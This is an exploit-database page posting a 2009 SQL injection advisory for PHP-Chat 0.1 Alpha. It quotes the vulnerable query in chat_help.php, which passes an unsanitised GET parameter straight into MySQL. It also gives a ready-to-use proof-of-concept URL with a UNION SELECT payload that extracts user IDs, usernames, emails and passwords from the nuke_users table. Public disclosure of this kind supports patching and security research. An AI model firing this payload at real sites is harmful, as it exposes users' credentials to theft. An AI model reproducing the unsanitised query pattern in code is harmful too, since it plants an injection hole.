r00tsecurity -> Exploit & Advisory Center :: PHP-Chat 0.1 Alpha SQL Injection

[ Log In | Register ]

Resource Database Index -> Exploits & Advisories -> PHP-Chat 0.1 Alpha SQL Injection

Description // Info

PHP-Chat is based purely on PHP/MySQL which means I don\\\'t use any other technology such as Java or Javascript.The Chat will be released as both a stand-alone and a PHP-Nuke version.

http://sourceforge.net/projects/php-chat

The exploit is located in the file chat_help.php where the $HTTP_GET_VARS[command] is passed directly to mysql without first sanitizing it 
[]
$query = \\\"SELECT * FROM `\\\" . $table_prefix . \\\"chathelp` WHERE `id` = \\\'$HTTP_GET_VARS[command]\\\' LIMIT 1\\\";
$result = mysql_query($query) or die(\\\"$query failed!\\\");
$row = mysql_fetch_row($result);
[]

Exploit // Proof of Concept

http://www.site.com/php-chat/chat_help.php?command=-1\\\'+UNION+SELECT+1,concat(user_id,username,user_email,user_password),3,4+FROM+nuke_users/*

Comments

You must be logged in to post comments.

Exploit Information

Type:
Remote - Web Application

Vendor:
PHP-Chat

Product:
PHP-Chat

Versions Effected:
0.1 Alpha

Submitted:
2009-09-22 - 19:43:43

Author:
Order Zero
E-Mail
Website

Greetz:
m0nkee, sToRm, and Barney-

[ Download | Report Issue ]

Exploit Search

Search by Type
+ Remote
+ Local
+ Application/Service
+ Web Application
+ Kernel
+ Operating System
+ Bug
+ Overflow
+ Shellcode
+ DOS
+ Advisory

Advanced Search